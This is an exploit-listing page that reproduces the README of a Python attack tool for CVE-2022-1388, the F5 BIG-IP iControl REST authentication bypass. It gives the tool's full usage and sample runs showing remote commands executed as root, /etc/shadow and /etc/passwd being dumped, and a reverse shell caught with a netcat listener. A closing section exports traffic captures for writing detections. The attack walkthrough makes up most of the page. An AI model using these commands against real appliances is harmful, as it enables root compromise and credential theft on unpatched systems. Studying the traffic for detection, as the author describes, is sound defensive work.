Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager CVE-2022-1388

Name: Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager CVE-2022-1388
Rating: 5 (234 reviews)
2022-12-24 | CVSS 7.5
## https://sploitus.com/exploit?id=E2690F56-34D9-5735-A733-8193CE2B6DBE
# CVE-2022-1388 RCE, Reverse Shell, and Auto-Export PCAP
### -- FOR EDUCATIONAL USE ONLY -- 

The author is not responsible or held liable for any actions taken with any aspect of this project/repository. I created this for the purposes of understanding the attack as well as writing detections within a SIEM and wanted to share for others to do the same. Use at your own risk.

This exploit targets the BIG-IP iControl REST vulnerability CVE-2022-1388 in F5 Systems. Please see the F5 advisory (https://support.f5.com/csp/article/K23605346) for affected versions and other information.

Feel free to PR or report any issues. This was tested on a few vulnerable F5 VE in Google Cloud from a CentOS machine with Python 3.6 

## Usage
```
CVE-2022-1388.py [-h] -t TARGET -p PORT [-c CMD] [-s] [-e] [-lh LHOST] [-lp LPORT]

optional arguments:
  -h, --help            show this help message and exit
  
  -t TARGET, --target TARGET, --RHOSTS TARGET
                        Target IP of vulnerable BIG-IP system
  -p PORT, --port PORT, --RPORT PORT
                        Target port on vulnerable BIG-IP system
  -c CMD, --cmd CMD, --command CMD
                        Command to run on target system
  -e, --export, --tcpdump
                        Export captured traffic and ssl-key.log | **Requires sudo privileges!
  -q, --quiet           Don't display banner
  -s, --shell           Launch an interactive shell
  -lh LHOST, --lhost LHOST, --LHOST LHOST
                        Required for -s [shell]; Local IP/interface to bind listener to
  -lp LPORT, --lport LPORT, --LPORT LPORT
                        Required for -s [shell]; Local port to bind listener to
 ```
 
 ## Remote Code Execution
 ```
 $ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c id
 
===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
        Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
=============================================================================================================== 


uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
```
```
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/shadow" -q
root:!!:18656:0:99999:7:::
bin:*:16479:0:99999:7:::
daemon:*:16479:0:99999:7:::
adm:*:16479:0:99999:7:::
lp:*:16479:0:99999:7:::
mail:*:16479:0:99999:7:::
uucp:*:16479:0:99999:7:::
[[ removed for brevity ]]
```

## Reverse shell
```
Attacker:
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -s -lh 10.142.0.8 -lp 4444

===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
        Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
=============================================================================================================== 


[+] If you haven't already, please start your listener of choice on port 4444
[+] Press any key to continue...

[+] Exploit finished. If you launched a reverse shell listener, check there for your terminal!
 
Listener:
$ nc -lp 4444
bash: no job control in this shell
[@localhost:Active:Standalone] restjavad # whoami
whoami
root
 ```
 
## Exporting a PCAP for analysis
Specifiying the -e (--export) flag will create two files: detection.pcap and ssl-key.log. These files will be overwritten every time the -e flag is specifed, so remember to move or rename the files you wish to keep. The ssl-key.log can be imported into Wireshark via Preferences -> Protocols -> TLS -> (Pre)-Master-Secret log filename to decrypt the TLS session. Note that because of tcpdump, when using -e, the script must be run as sudo.
```
$ sudo python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/passwd" -q -e
[+] Starting tcpdump on port 8443 for 5 seconds

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
[[ removed for brevity ]]
```

Before TLS Decryption:

<img width="784" alt="Wireshark 01" src="https://user-images.githubusercontent.com/58718722/209455397-a686fdc0-1b8e-408b-908b-0280166bf7d1.png">


Adding the automatically-exported ssl-key.log to the TLS preferences in Wireshark:

<img width="784" alt="Wireshark Preferences" src="https://user-images.githubusercontent.com/58718722/209455234-2cbfede9-0a89-4386-a362-7c1e37a67f29.png">


After TLS Decryption:

<img width="784" alt="Wireshark 02" src="https://user-images.githubusercontent.com/58718722/209455422-d22c87a9-be84-4262-a217-30621b67c89b.png">

<img width="728" alt="Wireshark 03" src="https://user-images.githubusercontent.com/58718722/209455326-751bc49a-a147-499d-b0c9-c6119668f5e9.png">